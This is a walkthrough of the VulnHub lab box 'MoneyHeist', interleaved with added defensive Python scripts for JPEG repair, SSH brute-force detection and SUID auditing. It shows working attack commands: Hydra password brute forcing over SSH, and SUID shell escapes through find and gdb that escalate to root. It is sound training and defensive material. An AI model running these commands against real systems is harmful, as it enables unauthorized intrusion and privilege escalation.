VulnHub: MoneyHeist: Catch Us If You Can
Today we will take a look at VulnHub: Catch Us If You Can. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.
![](https://miro.medium.com/v2/resize:fit:700/1*rNM9t9NJc4AhsImZlKYG7g.jpeg)
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 --open
![](https://miro.medium.com/v2/resize:fit:700/1*lc3kihbSxvfiw7NVSBoRLg.png)
- Gobuster scan
Command: gobuster dir -u http://192.168.0.110/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
![](https://miro.medium.com/v2/resize:fit:700/1*dZmaEZI8WDP52UMSbm2Nag.png)
When we look at the robots directory, we see the image tokyo.jpeg, but it is corrupted. Let’s download and fix it.
![](https://miro.medium.com/v2/resize:fit:700/1*nC0J8onzICKzgoCVJS75MA.png)
Command: wget http://192.168.0.110/robots/tokyo.jpeg
You can find the correct file headers here
Command: hexeditor tokyo.jpeg
![](https://miro.medium.com/v2/resize:fit:535/1*2gOrk4JuUNDYTYvh0M9J7w.png)
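The hexeditor step above restores the JPEG magic bytes by hand. As an added example (not from the writeup), the script below does the same repair programmatically and, just as important for forensic work, refuses to patch data that does not look like a JPEG at all. It assumes the damage is confined to the three leading Start-Of-Image bytes, which is the case the writeup shows; the sample blob is constructed here, not taken from the box.

```python
# Added example: repair a JPEG whose leading magic bytes were overwritten.
# Assumption: only the first three bytes (the SOI marker) are damaged.
from pathlib import Path

JPEG_SOI = b"\xff\xd8\xff"   # Start-Of-Image marker every JPEG begins with
JPEG_EOI = b"\xff\xd9"       # End-Of-Image marker every JPEG ends with


def looks_like_damaged_jpeg(data: bytes) -> bool:
    """Heuristic: SOI at offset 0 is wrong, but the body still carries a
    JFIF/Exif tag at offset 6 or ends with the EOI marker."""
    if data[:3] == JPEG_SOI:
        return False
    has_app_tag = data[6:10] in (b"JFIF", b"Exif")
    has_eoi = data.rstrip(b"\x00").endswith(JPEG_EOI)
    return has_app_tag or has_eoi


def repair_jpeg_header(data: bytes) -> bytes:
    """Return a copy with the first three bytes restored to FF D8 FF.
    Raises ValueError if the data does not look like a JPEG at all."""
    if data[:3] == JPEG_SOI:
        return data                      # nothing to fix
    if not looks_like_damaged_jpeg(data):
        raise ValueError("data does not look like a JPEG; refusing to patch")
    return JPEG_SOI + data[3:]


def repair_file(src: str, dst: str) -> bool:
    """Repair src into dst (never in place); returns True if bytes changed."""
    data = Path(src).read_bytes()
    fixed = repair_jpeg_header(data)
    Path(dst).write_bytes(fixed)
    return fixed != data


# Constructed sample: a minimal JPEG-like blob whose SOI marker was zeroed.
# Offset 3 is the second byte of the APP0 marker (E0), offsets 4-5 its
# length, and offset 6 carries the "JFIF" identifier, as in a real file.
DAMAGED_SAMPLE = (
    b"\x00\x00\x00"                     # corrupted SOI (should be FF D8 FF)
    + b"\xe0\x00\x10JFIF\x00\x01\x01"
    + b"\x00" * 8
    + JPEG_EOI
)

if __name__ == "__main__":
    fixed = repair_jpeg_header(DAMAGED_SAMPLE)
    print(fixed[:4].hex())              # ffd8ffe0
```

Writing the repaired copy to a separate file keeps the original evidence untouched, and the JFIF/Exif check stops the script from stamping a JPEG header onto something that was never an image.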
Let’s look at the corrected image.
![](https://miro.medium.com/v2/resize:fit:700/1*dqkqGGO_f5PQ7tWkaXUTsg.png)
This is a trap.
Let’s look at the gate directory.
![](https://miro.medium.com/v2/resize:fit:606/1*lhOObgdjJPNL3bh5llSe7g.png)
We see the gate.exe file. Let’s download it and take a look.
![](https://miro.medium.com/v2/resize:fit:381/1*OdxM-NPNzieNAJsQjsWrHw.png)
Here’s a new directory.
![](https://miro.medium.com/v2/resize:fit:700/1*5A2T6rBVkvyWtQoOfdrsfQ.png)
The page itself is simple. Let’s enumerate the BankOfSp41n directory.
Command: gobuster dir -u http://192.168.0.110/BankOfSp41n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
![](https://miro.medium.com/v2/resize:fit:700/1*MRfYa0GAGZyOWU5ETMi0sA.png)
login.php is a simple login page. Let’s try a few common default credentials.
![](https://miro.medium.com/v2/resize:fit:700/1*L4FsUawGuXPCiy5nC0UzsA.png)
Let’s look at the source code
![](https://miro.medium.com/v2/resize:fit:281/1*iXR04INLu42sxAUt5bNcPA.png)
![](https://miro.medium.com/v2/resize:fit:543/1*pascTNWc7MAv9zN0V97-Sw.png)
And here we find the username and the password. Let’s log in.
![](https://miro.medium.com/v2/resize:fit:700/1*MAv8mRwwXWsSyYGyk70FPA.png)
When I looked at the page, I couldn’t find anything to use.
I looked at the source code at the end and saw a username here.
![](https://miro.medium.com/v2/resize:fit:700/1*9gEwRsdWSh44Xnh0x4YPBQ.png)
Let’s try to log in over SSH with this username. But first we need the password.
- Hydra
Command: hydra -l arturo -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.110:55001 -I -t 4
![](https://miro.medium.com/v2/resize:fit:700/1*c1_t1r2XLF6d-wsucO6Elg.png)
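On the defending side, the Hydra run above leaves a very loud trace in the sshd authentication log. As an added example (not part of the writeup), the script below parses syslog-style sshd lines and raises an alert for any source that accumulates a threshold of failed logins inside a short window. The log lines are constructed to mirror the lab (user arturo, target on the 192.168.0.0/24 range); the hostname, PIDs and timestamps are assumptions.

```python
# Added example: detect SSH password brute forcing from sshd auth log lines.
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches "Failed password for [invalid user] <user> from <ip> port <n>".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failure(line: str):
    """Return (timestamp, user, ip) for a failed-login line, else None."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    # Syslog timestamps omit the year; an assumed year keeps ordering intact.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2024)
    return ts, m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60):
    """Sliding-window count of failures per source IP.

    Returns {ip: (set_of_usernames_tried, peak_failures_in_window)} for
    every source that reached `threshold` failures within `window_seconds`.
    """
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user) in window
    alerts = {}
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue                # successful logins and other noise
        ts, user, ip = parsed
        q = recent[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()             # drop failures that aged out of the window
        if len(q) >= threshold:
            users = {u for _, u in q}
            prev_users, prev_peak = alerts.get(ip, (set(), 0))
            alerts[ip] = (prev_users | users, max(prev_peak, len(q)))
    return alerts


# Constructed sample log: one noisy source hammering arturo, one stray
# typo from another host, and one legitimate login that must be ignored.
SAMPLE_AUTH_LOG = """\
Jun 12 10:01:02 moneyheist sshd[812]: Failed password for arturo from 192.168.0.105 port 51234 ssh2
Jun 12 10:01:05 moneyheist sshd[814]: Failed password for arturo from 192.168.0.105 port 51236 ssh2
Jun 12 10:01:08 moneyheist sshd[816]: Failed password for arturo from 192.168.0.105 port 51238 ssh2
Jun 12 10:01:11 moneyheist sshd[818]: Failed password for arturo from 192.168.0.105 port 51240 ssh2
Jun 12 10:01:14 moneyheist sshd[820]: Failed password for arturo from 192.168.0.105 port 51242 ssh2
Jun 12 10:01:17 moneyheist sshd[822]: Failed password for arturo from 192.168.0.105 port 51244 ssh2
Jun 12 10:05:00 moneyheist sshd[901]: Failed password for invalid user admin from 192.168.0.50 port 40022 ssh2
Jun 12 10:06:30 moneyheist sshd[905]: Accepted password for arturo from 192.168.0.50 port 40030 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, (users, peak) in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"ALERT {ip}: {peak} failures in window, users tried: {sorted(users)}")
```

Moving sshd to a non-standard port such as 55001, as this box does, does nothing against a scan followed by Hydra; a per-source failure threshold like this one (or fail2ban, which implements the same idea) combined with key-only authentication is what actually stops the attack.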
- SSH
![](https://miro.medium.com/v2/resize:fit:700/1*fn2Nl-cPf-dtfnh-phsn7A.png)
Command: find / -type f -perm -04000 -ls 2>/dev/null
![](https://miro.medium.com/v2/resize:fit:700/1*bM8Cbcwx18xF1QxxSyP0YQ.png)
Let’s switch user. We will use the SUID find binary for this.
Command: find . -exec /bin/sh -p \; -quit
![](https://miro.medium.com/v2/resize:fit:700/1*UUdyi5Z43JerTeh3h_pWEQ.png)
Yes, we are now denver.
![](https://miro.medium.com/v2/resize:fit:498/1*sul3qp1_iX0mNC1HuKyd8A.gif)
Let’s look at secret_diary in denver’s home folder; it gives us a new path. Let’s check it.
![](https://miro.medium.com/v2/resize:fit:700/1*RmKehovSHWFumWGCWbSRhQ.png)
Let’s use it to decode
![](https://miro.medium.com/v2/resize:fit:700/1*8btY4wf4Q3H44NBJdnCz6A.png)
Apply several decodings in turn until the text becomes readable.
![](https://miro.medium.com/v2/resize:fit:258/1*-eXOth2HhBgysl-NUoOe7g.png)
- Nairobi
Command: su nairobi
![](https://miro.medium.com/v2/resize:fit:700/1*eTlg_iDZIvb4MSmQzoEYlA.png)
![](https://miro.medium.com/v2/resize:fit:498/1*T04WDsVg3JA86Bs7anzFUw.gif)
- Tokyo
Command: find / -type f -perm -04000 -ls 2>/dev/null
![](https://miro.medium.com/v2/resize:fit:700/1*ijlRtAbU8vjqkkh1HKLj2Q.png)
Command: gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
![](https://miro.medium.com/v2/resize:fit:700/1*CSNHhMviVpUKJ4knFx5I1w.png)
![](https://miro.medium.com/v2/resize:fit:640/1*vVbNytgxFFxeFOz9MV5aXw.gif)
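Both privilege jumps on this box (denver via the SUID find, tokyo via the SUID gdb) come from the same root cause: setuid bits on binaries that should never carry them, owned by ordinary users. As an added example (not from the writeup), the script below takes the output of the `find / -type f -perm -04000 -ls` command used in both steps and compares it against a known-good baseline, flagging anything unexpected. The baseline set is an assumption for a Debian-style host, and the sample `find -ls` lines are constructed to mirror what the writeup finds; inode numbers, sizes and dates are made up.

```python
# Added example: audit `find / -type f -perm -04000 -ls` output against a baseline
# so unexpected setuid binaries (like find or gdb here) stand out.
from dataclasses import dataclass

# Assumed baseline of setuid binaries normally present on a Debian-style
# host. Generate the real one from a known-good image of your own build.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/lib/openssh/ssh-keysign",
}


@dataclass
class SuidFinding:
    path: str
    owner: str
    reason: str


def parse_find_ls(line: str):
    """Parse one `find -ls` line into (perms, owner, path); None if malformed.
    Columns: inode, blocks, perms, links, owner, group, size, month, day, year, path."""
    fields = line.split()
    if len(fields) < 11:
        return None
    perms, owner, path = fields[2], fields[4], " ".join(fields[10:])
    return perms, owner, path


def audit_suid(lines, baseline=BASELINE_SUID):
    """Return findings for setuid files that are non-root-owned or off-baseline."""
    findings = []
    for line in lines:
        parsed = parse_find_ls(line)
        if parsed is None:
            continue
        perms, owner, path = parsed
        if perms[3].lower() != "s":           # owner-execute slot not setuid
            continue
        if owner != "root":
            # A setuid binary owned by a user hands out that user's identity.
            findings.append(SuidFinding(path, owner,
                            f"setuid binary owned by non-root user {owner}"))
        elif path not in baseline:
            findings.append(SuidFinding(path, owner,
                            "setuid root binary not in baseline"))
    return findings


# Constructed sample mirroring the writeup: find is setuid denver, gdb is
# setuid tokyo, the rest are ordinary root-owned setuid binaries.
SAMPLE_FIND_LS = """\
   131124     64 -rwsr-xr-x   1 root     root        63960 Feb  7  2020 /usr/bin/passwd
   131001    160 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
   135877    320 -rwsr-xr-x   1 denver   denver     320160 Jun 20  2020 /usr/bin/find
   140211  10500 -rwsr-xr-x   1 tokyo    tokyo    10752448 Jun 20  2020 /usr/bin/gdb
   131110     52 -rwsr-xr-x   1 root     root        51312 Jan 26  2020 /usr/bin/mount
""".splitlines()

if __name__ == "__main__":
    for f in audit_suid(SAMPLE_FIND_LS):
        print(f"{f.path:20} owner={f.owner:8} {f.reason}")
```

Run against the real `find` output on a host, the two findings this produces are exactly the two binaries the writeup pivots through; the fix is `chmod u-s` on each, and re-running the audit on a schedule catches the bit if it ever reappears.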
I looked in Tokyo’s folder and saw a text like this.
![](https://miro.medium.com/v2/resize:fit:700/1*--VzYt1MdDPMHW3qRa-6dw.png)
If we combine the capital letters of the words, we get the root password.
![](https://miro.medium.com/v2/resize:fit:700/1*8s-vDpvRzVSC5FB92eQ0qQ.png)
And now we are root.
![](https://miro.medium.com/v2/resize:fit:640/1*7Bld_RhSNerFr3CnsHUfBQ.gif)
“If you have any questions or comments, please do not hesitate to write. Have a good day.”